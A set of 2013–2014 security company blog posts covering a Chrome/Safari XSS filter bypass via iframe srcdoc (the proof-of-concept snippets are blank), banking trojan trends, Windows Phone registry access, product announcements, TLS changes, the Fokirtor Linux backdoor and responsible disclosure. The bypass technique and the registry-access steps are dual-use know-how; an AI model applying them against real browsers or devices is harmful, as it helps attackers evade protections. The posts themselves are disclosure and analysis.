How to bypass antiXSS filter in Chrome and Safari (discovered by ElevenPaths)

Florence Broderick    20 January, 2014
Modern browsers usually have an antiXSS filter, that protects users from some of the consequences of this kind of attacks. Normally, they block cross site scripting execution, so the “injected” code (normally, JavaScript or HTML) is not executed inside victim’s browser. Chrome calls this filter XSSAuditor. Our coworker Ioseba Palop discovered a way to bypass it months ago. Since it is already resolved in the “main” version of Chrome, we are publishing technical details now.

In ElevenPaths, we just found a way to evade XSS filter in Chrome. This means, if the victim visits a website with an XSS problem that an attacker is trying to take advantage of, it would not be fully protected. The  bug  is  based  on  a  misuse  of  srcdoc  attribute  of  IFRAME tag,  included  in  HTML5 definition.  To  perform an  XSS  attack  on Google  Chrome  Browser  using this  bug,  the website must  include an IFRAME and must be able to read any attribute of this element from HTTP parameters (GET/POST) without applying any charset filter. Then, in the IFRAME parameter,  the  srcdoc  attribute  may be included with JavaScript  code. Chrome cannot filter it and will be executed.

To reproduce the PoC, there should be a webpage with some IFRAME tag like this:



And an HTML injection on src parameter would be:



and XSS filter will fail and let the script run.


Google derived this to Chromium, who does not treat this bypasses as a security problem, since XSSauditor is considered a second defense line.

The problem was reported in October, the 23rd. They fixed it two days later, making XSSAuditor catch reflected srcdoc properties even without an “IFRAME” tag injection. Chrome has just fixed it in recent 32.0.1700.76 version.
Some other bug

A few weeks ago, in this post, someone took our PoC as an inspiration and developed another way of bypassing the filter. This one is still not fixed. The trick is to inject an opening “script” tag inside a parameter that is written directly in the HTTP request output stream. This is, without filtering any character just as our case. In this writing there should be content inside scripts tags that belongs to the web itself.



The browser will include our injection (remember, without closing the tag), omit the “script” opening tag from the web itself, and now, use the closing one from the web to create a well formed script and execute it… this is the bypass.




Safari, still vulnerable

Safari for Mac and iPhone is vulnerable as well. They confirmed our email, and told us they were working on it. And seems that they still are, since the program is still vulnerable. Everytime we have tried to contact back with them again, they reply back telling there is no news, but they are working on it. Internet Explorer filters it with its own filter, and Firefox does not implement an XSS filter by itself.

Banking trojan I+D: 64 bits versions and using TOR

Florence Broderick    8 January, 2014
Malware industry needs to improve and keep on stealing. So they research and invest. There are two different ways of investing if you are “in the business”: one is investing in new vulnerabilities so you can infect more efficiently. This is complex and will not talk about that in this post. The other side to invest in, is how to steal more efficiently once the victim is infected. What have they done about it lately?
Which is the most lucrative banking trojan?
There are millions of banking trojans. More that you can probably imagine, and more than the antivirus companies can handle. But most of them have quite a lot in common. Basically in their targets (stealing, the more the better) and in the way they break into a system and keep the infection. 

 

If we simplify a lot, the most lucrative banking trojan is the one we call “ZeuS” or “Zbot”, born in late 2005. Zeus, depending on who you are talking to, is one thing or another. Its story is long enough to cover code leakages, mutations, copycats… For this article, ZeuS is basically a philosophy and a template. A “template” because it allows, with a program, to create a banking trojan targeting bankings on demand, with its own syntax and some rules. A DIY kit with very advanced features. It is also a “philosophy” because of the way it steals, that may be considered a standard nowadays. ZeuS consolidated a style in banking trojan. What it does, and the basis of its success is (among mucho more things): 
  • It injects itself in the browser, so it can modify what the user actually sees in the screen. It injects new fields or messages and modifies the behavior or sends the relevant data to the attacker. 
  • If not injecting anything, it captures and sends all the outgoing https traffic to the attacker.
In this way and with this basic structure, ZeuS (as a concept) is alive and kicking for 8 years now. There is some more malware with different names, but fundamentally, they follow some of this style patterns.

Browser usage. 64 bits Chrome version is under developing in Windows. 64 bits version for Firefox for Windows was even cancelled for a while.
What are they investing in?
ZeuS has evolved technically, but maintaining same basic structure. Is there an “official”  ZeuS branch? Yes, you can buy it, but there are forks and other variants that became standard. Some features appear from time to time and some group of attackers adopt, copycat or buy them.
Focusing on latest changes, the most significant observed are:  Using TOR to communicate to Command and Control Servers and Zeus compiled directly for 64 bits. Although not seen “in the wild”, this improves dramatically ZeuS capabilities.

One of the weak points (and advantages, in a way) of ZeuS (and malware in general these days) is that it strongly depends on external servers. Once these servers are down, the trojan becomes mostly useless. To solve this, so far they have used dynamic domains, domain random generator, fast flux playing with DNS, bulletproof hosting… and all these techniques are ok but they result expensive. Using TOR and .onion domains gives them “inexpensive” strength. Shutting down this servers will be very difficult for the good guys, and easier for the attacker to keep than any other “resilient” infrastructure used so far.

On the other hand, creating a 64 bits native version requires some clarification. Today, most of Windows system are 64 bits. In this architecture, 64 and (most of) 32 bits applications (except drivers) can run without problems. That is way today most of programs are compiled for 32 bits, so they can run in XP (with a not very used 64 bit version) and any other Windows (mostly 64 bits). So developers create 32 bits versions for all of them to ease compatibility. So does malware. Today, even with a 64 bits OS, browsers are still 32 bits (even IE, that comes in this two flavors in latest Windows). The reason is being compatible with plugins and extensions that are still 32 bits. So, why creating a 64 bit version of malware? Just because they can. They are maybe experimenting right now, for the near future. In fact, the 64 bit version have been detected “inside” a 32 version. This means that, once infected, it uses one or another depending on the browser. They will find very few people using a 64 bits browser (Its says only 0,01% of desktops are using native 64 bits IE), but that few is a market they do not want to refuse to, and when it raises (browsers are making efforts to have native 64 bits versions that will end up imposing) they want their software to be ready.
There is maybe another reason. Using 64 bits versions makes them even more unnoticeable for sandboxes in antivirus companies. This is the first step for most of AVs that goes through this detection circuit: sandbox, and, if suspicious, deeper analysis and, if even more suspicious but not classified yet… manual analysis. XP is still very used as a sandbox. 64 bits version of malware will not work there, and will go probably as a corrupted file. But this depends much on their resources and the way they work.
What that this changes mean?
That banking trojan developers do not fear users and just a little bit the AV companies… Their only limitations are their own technical skills. If they want to, they can be even more proactive than any other industry. And that they want the whole cake of users with every single nickel they have.
Sergio de los Santos

Accessing (and hacking) Windows Phone registry

Florence Broderick    30 December, 2013
Although Microsoft’s efforts on securing Windows Phone 8 devices from community hacks, accessing the device’s registry is still possible with some limitations. Writing to the registry is denied by default but read-permissions are quite lax.
First approach

When trying to read the registry, initial approach is (maybe) to invoke a low-level library from WIN32 API, such as winreg.h to import the necessary functions. However, PInvoke/DllImport isn’t available in Windows Phone, so we would have to implement it from scratch. Needless to say that this breaks Microsoft’s requirements for submitting such an application to the Store.
Doing some research shows that much work has already been done and is available for public download in the “XDA Developers” forum. There is a project called “Native Access” by GoodDayToDie that does exactly this. However compiling and using it is not straightforward so we’ll give it a go and show how to do it.

Dependencies

The project’s source code can be download from the following link: http://forum.xda-developers.com/showthread.php?t=2393243.To get the referenced libraries needed for building the project, it is needed to convert the phone’s DLLs into .lib format (using, for example dll2Lib available from https://github.com/peterdn/dll2lib). Actually, the needed libraries are in system32 directory, but using the emulator’s libraries will not work on an actual phone. So you will need an image from real devices. There are ISO files available “out there”, so you can get and extract them easily.

Once done, you need to place the extracted .LIBs in the Libraries folder of the WP8 SDK (typically in Program Files (x86)Microsoft SDKsWindows Phonev8.0Libraries).
Problems compiling

However, if you have trouble compiling the code, there’s a shortcut by referencing the .winmd file from an existing project that uses Native Access (WebAccess for example). Just extract the XAP’s contents (which is just a zip file) and search for “Registry.dll” which is a precompiled version of the project.
Now we are ready to use the library and writing code to search for some interesting keys in the registry. The class provides all of the necessary methods to access the registry: ReadDWORD, ReadString, ReadMultiString, ReadBinary, ReadQWORD, GetHKey, GetSubKeyNames, GetValues

A real example

Here are the codes needed to access the different registry hives:

  • 80000000 -> HKEY_CLASSES_ROOT
  • 80000001 -> HKEY_CURRENT_USER
  • 80000002 -> HKEY_LOCAL_MACHINE
  • 80000003 -> HKEY_USERS
  • 80000004 -> HKEY_PERFORMANCE_DATA
  • 80000005 -> HKEY_CURRENT_CONFIG
Example code to access registry in Windows Phone 8

For some registry locations that are highly sensitive, or for writing or creating keys, you need to add special Capabilities to your app. This will require an interop-unlock that has currently been achieved only in Samsung devices by taking advantage of Samsung’s “Diagnosis tool”.

Tero de la Rosa

FOCA Final Version, the ultimate FOCA

Florence Broderick    16 December, 2013
You all know FOCA. Over the years, it had a great acceptation and became quite popular. Eleven Path has killed the FOCA to turn it into a professional service, FaasT. But FOCA did not die. FOCA Pro is now a portable version called FOCA Final Version that you can download for free.

FOCA Free vs. FOCA Pro
There used to be a FOCA Free and a FOCA Pro. The Pro version included some extra features such as reporting, analysis of error messages in response pages, fuzzing of URLs searching for data type conversions errors in PHP, syntax errors in SQL/LDAP queries, integer overflow errors, and more parallelism in its core. It had no ads either.

But now, FOCA joins in just one version, based on FOCA Pro, but for free. So here it is FOCA Final Version. This final version includes all the plugins available and the tools for you to create your own plugins. Some bug reported by users had been fixed as well.

If you want to know how it works and some secrets, you can buy this new book about pentesting using FOCA.

FOCA Final Version
FOCA is free for download with no registration from Eleven Paths Labs page.

Hope you enjoy it.

Latch, new ElevenPaths' service

Florence Broderick    12 December, 2013
During the time we’ve been working in ElevenPaths we’ve faced many kind of events internally, buy one of the most exciting and awaited is the birth of Latch. It’s a technology of our own that has been invented, patented and developed by our own team… and, at last, exhibited to the world. We’re proud of the work that has been done and we needed to tell about it. Finally we can do so. This is Latch.

We think that users do not use their digital services (online banking, email, social networks…) 24 hours a day. Why would you allow an attacker trying to access them at any time then? Latch is a technology that gives the user full control of his online identity as well as better security for the service providers.

Latch, take control of when it’s possible to access your digital services.
Passwords, the oldest authentication system, are a security problem that we have to deal with every day. Second factor of authentication, biometry, password managers… We haven’t found yet the ultimate solution for the user not to depend on simple passwords, reusing them, or writing them on a paper. Latch isn’t that solution, either. Even advanced users that use good password practices are exposed to their passwords being stolen. Malware that focuses on credentials thievery are very “usual” since long agoBut even the most cautious users may have their passwords stolen by attackers if a third party’s database is hacked and exposed. Latch isn’t a solution for this problem, either.
Latch doesn’t replace passwords, but complements them and makes any authentication system stronger.

Latch’s approach is different. Avoiding authentication credentials ending in wrong hands is very difficult. However, it’s possible for the user to take control of his digital services, and reduce the time that their are exposed to attacks. “Turn off” your access to email, credit cards, online transactions… When they’re not being used. Block them even when the passwords are known. Latch offers the possibility for the user to decide when his accounts or certain services can be used. Not the provider and, of course, nor the attacker.
Latch makes it possible to control your services even if an attacker has stolen the user’s password, credit card or any other service that needs authentication, making it impossible for the attacker to use the stolen data in that service out of a defined time interval. In other words, (by just pushing a button) it’s possible to make the authentication credentials for any service valid only for that very moment when the user needs to introduce them on the system. 

Latch’s scheme
Even though we’ve talked about passwords, Latch is actually a service to protect service provider’s defined processes for interacting with the end user. The background and uses that may be given to these processes are independent of the protection layer that Latch provides.
The main idea of the structure of this protection is limiting the exposure window that an attacker owns for taking advantage of any of these processes. The user will decide if his service accounts are turned ON or OFF and even will detail the actions that can be taken from those services. This makes it possible to reduce in time the possibilities of an attack, associating an external control to every operation. The service provider requests Latch for the user-defined status of a certain operation for a defined time.
Latch’s general work scheme
In this figure, a client that tries to execute an operation from a service provider obtains confirmation on whether the operation has been allowed or denied.

The configuration of an operation’s state is made through an alternative channel (and considered more “secure” than the regular device), so any attempt to access an operation blocked by the user may be identified as an anomaly. Such an anomaly could imply that the user trying to access the blocked operation is not reality who he’s claiming to be and a possible fraud attempt is identified.

How it works in practice
The user will only need a smartphone to “activate” or “deactivate” the services paired with Latch. To do so, he or she will need to:
  • Create a Latch user account. This account will be the one used by the user to configure the state of the operations (setting to ON or OFF his services accounts).
  • Pairing the usual account with the service provider (an email account or a blog, for example) that the user wants to control. This step allows Latch to synchronize with the service provider and to provide the adequate responses (defined by the user) depending on which operation is tried to be used. The service provider must be compatible with Latch, of course. This allows the users to decide whether to use Latch or not. Latch is offered but not imposed.

Latch for the service providers

Latch allows the users to configure the access to their services, and to accomplish this, the service providers need to integrate Latch in their systems. We’ve programmed different SDKs in many different languages (.NET, PHP, ASP…) and we’ve created plugins for already existing platforms such as WordPress, PrestaShop, Drupal and Joomla. The webpages using these platforms are able to offer Latch to their users quite easily…  so the users deciding  to use the service may take advantage of Latch also very easily.


The integration is easy and straightforward, giving the service provider a great opportunity to improve the security offered to its users, and therefore, their online identity.

And that is not all…

Latch offers more ways to protect users, their credentials, online services and online identities. We will introduce them soon. Stay tuned.

EmetRules: The tool to create "Pin Rules" in EMET

Florence Broderick    6 December, 2013
EMET, the Microsoft tool, introduced in its 4.0 version the chance to pin root certificates to domains, only in Internet Explorer. Although useful and necessary, the ability to associate domains to certificates does not seem to be very used nowadays. It may be hard to set and use… we have tried to fix it with EmetRules.

To pin a domain with EMET it is necessary
  • Check the certificate in that domain
  • Check its root certificate
  • Check its thumbprint
  • Create the rule locating the certificate in the store
  • Pin the domain with its rule

Steps are summarized in this figure:


It is quite a tedious process, much more if your target is to pin a big number of domains at once. In Eleven Paths we have studied how EMET works, and created EmetRules, a little command line tool that allows to complete all the work in just one step. Besides it allows batch work. So it will connect to domain or list indicated, will visit 443 port, will extract SubjectKey from its root certificate, will validate certificate chain, will create the rule in EMET and pin it with the domain. All in one step.

EmetRules de ElevenPaths

The way it works is simple. The tools needs a list of domains, and will create its correspondent XML file, ready to be imported to EMET, even from the tool itself (command line).

Some options are:

Parameters:
  • “urls.txt” Is a file containing the domains, separated by “n”. Domains may have “www” on them or not. If not, EMET will try both, unless stated in “d” option (see below).

  • “output.xml” specifies the path and filename of the output file where the XML config file that EMET needs will be created. If it already exists, the program will ask if it should overwrite, unless stated otherwise with “-s” option (see below).

Options:

  •  t|timeout=X. Sets the timeout in milliseconds for the request. Between 500 and 1000 is recommended, but it depends on the trheads used. 0 (by default) states for no timeout. In this case, the program will try the connection until it expires.
  • “s”, Silent mode. No output is generated or question asked. Once finished it will not ask if you wish to import the generated XML to EMET.
  • “e”, This option will generate a TXT file named “error.txt” listing the domains that have generated any errors during connection. This list may be used again as an input for the program.
  • “d”. This option disables double checking, meaning trying to connect to main domain and “www” subdomain. If the domain with “www” is used in “url.txt”, no other will be connected. If not, both will be connected. With this option, it will not.
  •  c|concurrency=X. Sets the number of threads the program will run with. 8 are recommended. By default, only one will be used.
  • “u”. Every time the program runs, it will contact central servers to check for a new version. This option disables it.

Tool is intended mainly for admins or power users that use Internet Explorer and want to receive an alert when a connection to a domain is suspected to be “altered”. Pinning system in EMET is far to be perfect, and even the warning displayed is very shy (it allows to get to the suspected site), but we think is the first step to what it will be, for sure, an improved feature in the future.


We encourage you to use it.

December 12h: Innovation Day in Eleven Paths

Florence Broderick    29 November, 2013

On December 12th, 2013, in Madrid, Eleven Paths will come out in society in an event we have named Innovation Day. In this event Eleven Paths will introduce old an new services, besides some surprises. Registration is necessary to assist, from this web.

Eleven Paths started working inside Telefónica Digital six months ago. After quite a lot of hard word, it is time to show part of the effort we have been trough during this time. Besides Eleven Paths, Telefónica de España and Vertical de Seguridad de Telefónica Digital will present their products and services as well, in this Innovation Day.

We will talk about Teléfónica CiberSecurity services, FaastMetaShield Protector family products, Saqqara, antiAPT services… and, finally, about a project that has remained secret so far and dubbed “Path 2” internally. December 12th and later on, this technology will be revealed step by step. For Eleven Paths, it has been a real challenge to deploy it during this period. But right now, it is a reality. It is already integrated in several sites and world level patented.

Clients, security professionals and systems administrators… they are all invited. The event will occur on Thursday, December 12th during the afternoon (from 16:00)  in the central building Auditorio of campus DistritoTelefónica in Madrid. Besides announcing all this exiting technology, we will enjoy live music concerts. Finally, there will be a great party, thanks to all security partners in Telefónica.

Registration is limited, so a pre-registering form is available. Once filled up, a confirmation email will be sent (if it is still possible to assist).

The "cryptographic race" between Microsoft and Google

Florence Broderick    21 November, 2013
Google and Microsoft are taking bold steps forward to improve the security of cryptography in general and TLS / SSL in particular, raising standards in protocols and certificates. In a scenario as reactive as the security world, these movements are surprising. Of course, these are not altruistic gestures (they improve their image in the eyes of potential customers, among other things). But in practice, are these movements useful?
Google: what have they done
Google announced months ago that it was going to improve the security in certificates using 2048 bits RSA keys as minimum. They have finished before they thought. They want to remove 2014 bit certificates from the industry before 2014 and create all of them with 2048 bit key length from now on. Something quite optimistic, keeping in mind that they are still being used a lot. Beginning 2014, Chrome will warn users when certificates don’t match their requisites. Rising the key bits up to 2048 in certificates involves that trying to break the cipher by brute forcing it becomes less practical with current technology.
Besides, related with this effort towards encrypted communications, since October 2011, Google encrypts traffic for logged users. Last September, it started to make it in every single search. Google is trying as well to establish “certificate pinning” and HSTS to stop intermediate certificates when browsing the web. If that wasn’t enough, their certificate transparency project goes on.

Seems like Google is particularly worried about its users security and, specifically (although it may sound funny for many of us) for their privacy. In fact, they asset thatthe deprecation of 1024-bit RSA is an industry-wide effort that we’re happy to support, particularly light of concerns about overbroad government surveillance and other forms of unwanted intrusion.”.
Microsoft: what have they done
In the latest Microsoft update, important measures to improve cryptography in Windows were announced. In the first place, it will no longer support RC4, very weak right now (it was created in 1987) and responsible for quite a lot of attacks. Microsoft is introducing some tools to disable it in all their systems and wants to eradicate it soon from every single program. In fact, in Windows 8.1 with Internet Explorer 11, the default TLS version is raised to TLS 1.2 (that is able to use AES-GMC instead of RC4). Besides, this protocol also uses SHA2 usually.

Another change in certificates is that it will no longer allow hashing with SHA1 for certificates used in SSL or code signing. SHA1 is an algorithm that produces a 160 bits output, and is used when generating certificates with RSA protocol to hash the certificate. This hash will be signed by the Certificate Authority, showing its trust this way. It has been a while since NIST encouraged to stop using SHA1, but fewer cared about that claim. It looks like a quite proactive for Microsoft, that got us used to an exasperate reactive behavior.
Why all this? Is this useful?

Microsoft and Google are determined to improve cryptography in general and TLS/SSL in particular. With these measures adopted between both of them, the security of the way traffic is encrypted, is substantially raised.
2048 bits certificate using SHA2
(SHA256).
Certificates that identify public keys calculated with 512 bits RSA keys, were broken in practice in 2011. In 2010,  a 768 bits number (212 digit) was factored with a general purpose algorithm and in a distributed way. The higher known. So, in practice, using a 1024 bits number is “safe”, although it could be discussed if it represents a threat in near future. Google is playing safe.

But there are some other problems to focus on. Using stronger certificates in SSL, is not the main obstacle for users. In fact, introducing new warnings (Chrome will warn about 1024 bit certificates) may just make the user even more confused: “What does using 1024 bits mean? Is it safe or not? is this the right place? what decision should I take?“. Too many warnings just relaxes security (“which is the right warning when I am warned about safe and unsafe sites?”). The problem with SSL is that it’s socially broken, and is not understood… it’s not about the technical standpoint but from the users. Users will be happy that their browser of choice uses stronger cryptography (so the NSA can’t spy on them…), but it will be useless if, confused, accepts an invalid certificate when browsing, not being aware that it’s introducing a man-in-the-middle.

If we adopt the theory that NSA is able to break into communications because it already has adequate technology as to bruteforce 1024 bits certificates, this is very useful. There would be a problem if it wasn’t necessary to break or brute force anything at all, because the companies were already cooperating to give NSA plain text traffic… We could dismiss that NSA had already their own advanced systems ready to break 2048 bit keys, and that is why they “allow” its standardization… couldn’t we? We just have to look back a few years to remember some conspiracy tales like these in the world of SSL.
Selfsigned certificate created in Windows 8 and using
MD5 and 1024 bits.
The case of Microsoft is funny, too. Obviously, this movement in certificates is motivated because of  TheFlame. Using MD5 with RSA played a bad trick, allowing the attackers to sign code in its name. It can’t happen again. This puts Microsoft ahead of deprecating SHA1 for certificates, because the industry will follow. But if RC4 is really broken, SHA1 health is not that bad. We have just started getting rid of MD5 in some certificates, when Microsoft claims the death of SHA1. This leaves as just with the possibility of using SHA2 (sha256RSA or sha256withRSAEncryption normally in certificates, although SHA2 allows the use from 224 to 512 bits output). It’s the right moment, because XP is dying, and SHA2 wasn’t even natively supported (just from service pack 3). There is still a lot of work to be done, because SHA1 is very extended (Windows 7 signs most of its binaries with SHA1, Windows 8, with SHA2), that is why deadline is 2016 in signing certificates and 2017 for SSL certificates. The way Certification Authorities will react… is still unknown.
On the other hand, regarding the user of mandatory TLS 1.2 (related in a way, because it’s the protocol supporting SHA2), we have to be aware of the recent attacks against SSL to know what it’s really trying to solve. Very briefly:
  • BEAST, in 2011. The problem was based in CBC and RC4. It was really solved with  TLS 1.1 and 1.2. But both sides (server and browser) have to be able to support these versions.
  • CRIME: This attack allows to retrieve cookies if TLS compression is used. Disabling TLS compression solves the problem.
  • BREACH: Allows to retrieve cookies, but is based on HTTP compression, not TLS, so it may not be “disabled” from the browser. One is vulnerable whatever TLS version is being used.
  • Lucky 13: Solved in software mainly and in TLS 1.2.
  • TIME: A CRIME evolution. It doesn’t require an attacker to be in the middle, just JavaScript. It’s a problem in browsers, not TLS itself.
A very common certificate yet, using
SHA1withRSAEncryption and 1024 keys
We are not aware of these attacks being used in the wild by attackers. Imposing 1.2 without RC4 is a necessary movement, but risky yet. Internet Explorer (until 10) supports TLS 1.2 but  is disabled by default (only Safari enables it by default, and the others just started to implement it). Version 11 will enable it by default. Servers have to support TLS 1.2 too, so we don’t know how they will react.
To summarize, it looks like these measures will bring technical security (at least in the long term). Even if there are self interests to satisfy  (avoiding problems they already had) and an image to improve (leading to the “cryptographic race”), any enhancement is welcome and this “war” to lead the cryptography, (that fundamentally means being more proactive that your competitors), will raise up the bar.
Sergio de los Santos

Fokirtor, a sophisticated? malware for Linux

Florence Broderick    18 November, 2013
Symantec has just released some details about how a new malware for Linux works. It is relevant for its relative sophistication. It was discovered in June as a fundamental part of a targeted attack to a hosting provider, but it’s now when they disclose technical details about how it works. Although sophisticated for Linux environment, technically it’s not so relevant if we compare it with malware for Windows.

In May 2013, an important hosting provided was attacked. They knew exactly what they were doing and what errors to avoid. They wanted financial data and user passwords (oddly enough they were stored ciphered, but they cannot rule out the master key was not compromised…). This happens everyday, but the difference is the method used: Fokirtor, that is the way Symantec has baptised the trojan used as the attacking tool.

It was a quite important company, and they needed to evade the security systems, so they tried to be unnoticed injecting the trojan to some servers process as a SSH daemon. In this way, they disguised their presence physically (no new processes were needed) and in the traffic (that would be merged with the one generated by the SSH service itself). This is a “standard” method in malware for Windows, where regular trojans usually inject themselves inside the browser and cover their traffic under HTTP.


Of course, the malware needed connectivity with the outside world to receive commands. In the world of Windows, malware usually connects outbound periodically (to elude inbound firewall) towards a C&C via HTTP. In the case of Fokirtor, what it did was hooking functions and wait for commands injected in SSH process, preceded by ” :!;.  characters (without quotes). This would indicate that the attacker wanted to make some action. This method isn’t new. Usually, when some legitimate software is trojanized in Linux’s world, a reacting way for a certain pattern is embedded in its code, and then is published so it’s downloaded by the future victims. What isn’t so usual is to make it “on the fly” injecting it in a process. Although the news doesn’t make it clear, we understand that the attacker had to get root privileges in the compromised machine.

The attacker just had to connect via SSH to the servers and send the magic sequence to take over the machine. Received commands were coded in base64 and ciphered with blowfish (designed by Bruce Schneier in 1993). This traffic wasn’t logged.
Sophisticated?
In absolute terms, technically it’s under the “standard” malware for Windows, and light years behind professional malware as a “ciberwapon” (TheFlame, Stuxnet, etc). Nevertheless, it does represent an interesting milestone that doesn’t usually happen: finding specific malware for Linux servers that actively seeks to be unnoticed. 

To recall similar news, we have to go a year back. An user sent an email to the security list “Full Disclosure”, stating he had found his Debian servers infected with what seemed to be a “rootkit working with nginx”. It was about an administrator that had realized that the visitors of its web were being redirected to infected sites. Some kind of requests to that web server, returned an iframe injected in the page, that took to a point where Windows users tried to be infected. The administrator discovered some hidden processes and kernel modules responsible for the problem, and attached them to the email so it could be studied. After analyzed, we didn’t have too many news about that rootkit.

Some questions without answers

Something that calls the eye but doesn’t seem to have an explanation, is that Symantec detected this malware in June, with the same name, but hasn’t offered technical details about the way it works since now. What happened during these five months? Probably they have been studying it in cooperation with the affected company. Unless they have come across with administrative or legal problems, technically it’s not necessary to spend so much time to analyze a malware like this. And what happened before June? The attack was detected in May, but nothing is said about for how long the company was infected. It would be interesting to know the success of its hiding strategy during a real infection period. Being a hosting provider, have webpages of their costumers been compromised?


They say nothing about the trojan being able to replicate itself, or about detecting it in any other system. Possibly it’s a targeted attack to a specific company, and the attackers didn’t add this functionality to their tool. Just the strictly necessary to accomplish their task.

Although we instinctively relate Windows systems with malware world, when the attackers have a clear target, whatever operating system it is, there are no barriers. Or they are even weaker. Do not forget malware, technically speaking, is just a program “as any other” and only the will of programming it separates it from becoming a reality for a specific platform.
Sergio de los Santos

Responsible full disclosure… por ambas partes

Florence Broderick    13 November, 2013


La revelación responsable de vulnerabilidades es un viejo debate, pero no necesariamente zanjado. Vamos a observarlo desde el punto de vista del sistema vulnerable o afectado, no desde el investigador (que es al que normalmente se le exigen las responsabilidades). Si se practica la revelación responsable, este adjetivo debe aplicarse tanto al que lo detecta, como al afectado.
La anécdota
En ElevenPaths, alertamos hace algunas semanas sobre un pequeño fallo en la web de Cisco, en concreto de su servicio Meraki de redes a través de la nube. En una ruta concreta se divulgaba información quizás sensible.
Entre otros, se observa el nombre de usuario ssh, el servidor SVN, rutas a la red interna, y otros nombres de usuarios SVN. Quizás no se encuentren actualizados los datos y su impacto sea mínimo, pero es una información que definitivamente no debería estar ahí.
Cisco determina en su programa, bajo estas condiciones, las normas para alertar sobre fallos de seguridad:
 

We take these reports seriously and will respond swiftly to fix verifiable security issues. […] Any Cisco Meraki web service that handles reasonably sensitive user data is intended to be in scope. This includes virtually all the content under *.meraki.com. […] It is difficult to provide a definitive list of bugs that will qualify for a reward: any bug that substantially affects the confidentiality or integrity of user data is likely to be in scope for the program.

 

La revelación de información se les notificó a principios de noviembre. Dos días después la respuesta de Meraki fue peor de lo esperado:

I have looked into your report and, unfortunately, this was first reported to us on 9/23/13, with a resolution still pending from our engineers.

Esto implica que se alegaba que un tercero lo había descubierto previamente y lo que es peor, que el problema les era conocido desde hacía al menos cinco semanas y aún no lo habían (y no lo han) resuelto. Simplemente se trata eliminar una página de un servidor o protegerla con contraseña.

Otros problemas y vulnerabilidades descubiertos por nuestro equipo, bastante más complejos, han sido resueltos en mucho menos tiempo. Los problemas que se pueden zanjar eliminando una página, prácticamente suelen solucionarse en el mismo día que se detectan.

Salvando absolutamente todas las distancias, otros usuarios que han participado en los “bounty programs” de Facebook, PayPal (especialmente torpe con su programa) o Google, se quejan de que han recibido, en “demasiadas” ocasiones, la respuesta de que ya alguien les había alertado previamente. Incluso afirma que al pedirle a PayPal pruebas de que alguien se les había adelantado, nunca contestaron. Es incluso más común oír que los fabricantes tardan demasiado en corregir cualquier error cuando se alerta de ellos de forma privada.

Antecedentes

Al margen de la anécdota introductoria, la “divulgación responsable” es un viejo debate, y existen muchos ejemplos con los que periódicamente se ha reabierto. En resumen: al divulgar una vulnerabilidad, en cierta manera, se ataca directamente al crimen en la red donde más le duele,  devaluando un valor muy apreciado. También, hacer público cualquier error hace que su prevención y detección sea mucho más generalizada y por tanto, previene futuros ataques. Incluso, podría llegar a “detener” ataques que hipotéticamente se estuviesen realizando aprovechando un fallo antes de que el investigador lo hiciese público.

En la parte negativa, cuando se hace público, otros atacantes lo incorporan a su arsenal y pueden aprovechar esa vulnerabilidad para lanzar nuevos ataques.  Aunque a su vez, ataques de difusión masiva siempre van acompañados de defensas mucho más variadas y asequibles. Por último también es cierto que el hecho de hacer públicos los fallos acelera el proceso de corrección en el fabricante.

El “full disclosure” en realidad, no elimina el impacto de una vulnerabilidad sino que lo transforma: desde un hipotético uso exclusivo del fallo en el mercado negro, inadvertido y muy peligroso, con objetivos muy concretos y valiosos donde pocos ataques dan un alto beneficio; hasta ataques indiscriminados aunque cazados en mayor medida por los sistemas de detección.

Otras responsabilidades

Ahora que están de moda los programas de recompensa, son muchas las compañías que han intentado motivar la revelación responsable premiando económicamente a los que descubren vulnerabilidades y problemas de seguridad. Pero es necesario recordar que desde la posición del afectado, también se crean nuevas responsabilidades. Es muy habitual que se hable de que, por ejemplo, el descubrimiento se atribuirá al primero que escribe al equipo de seguridad. Pero, ¿cómo se demuestra esto? ¿Cómo podría acreditar alguien que ha enviado un correo describiendo un fallo o vulnerabilidad antes que nadie? Los fabricantes podrían obligar a utilizar PGP firmado con timestamp o incluso servicios gratuitos como eGarante para alertar y garantizar los avisos, pero no parece que ninguno recomiende explícitamente su uso. Las empresas que ofrecen recompensas, sugieren en el mejor de los casos el cifrado en las comunicaciones, pero por confidencialidad, más que por la demostración de autoría.

También debemos atender a la responsabilidad de arreglar en un tiempo razonable una vulnerabilidad o fallo. ¿Cuánto tiempo es aceptable? En agosto de 2010 Zero Day Initiative de TippingPoint, harto de vulnerabildiades que se eternizaban, impuso una nueva regla destinada a presionar a los fabricantes de software para que solucionen lo antes posible sus errores: si pasados seis meses desde que se les avise de un fallo de seguridad de forma privada, no lo han corregido, lo harían público. Para fallos web triviales, como el caso de la anécdota, deberían darse menos tiempo, incluso. Lo que añade un nuevo problema: ¿existe alguna forma “justa” o responsable de evaluar la gravedad de un problema y por tanto, su valor económico a la hora de recompensarlo? En el caso de las compañías que hacen de intermediarias, el precio suele estar más o menos fijado, pero en los bounty programs “privados” de cada empresa, este puede ser un valor muy subjetivo.

Los programas de recompensa pretenden premiar a los investigadores, motivarlos para que las vulnerabilidades salgan del circuito del mercado negro, y además obtener una “auditoría” avanzada a un precio que consideren justo. También pretenden ofrecer una imagen de compañía responsable y que premia el trabajo de los profesionales de la seguridad… pero deben estar preparados para responder diligentemente y actuar de forma tan profesional y responsable como exigen a los investgadores, para mantener esa imagen que se pretende proyectar. Si no, que se lo digan a Yahoo!, que a mediados de año, fue ridiculizada tras ofrecer 12.50 dólares (canjeables en productos de la propia Yahoo!) a una compañía que descubrió serios problemas de seguridad en su red.

Sergio de los Santos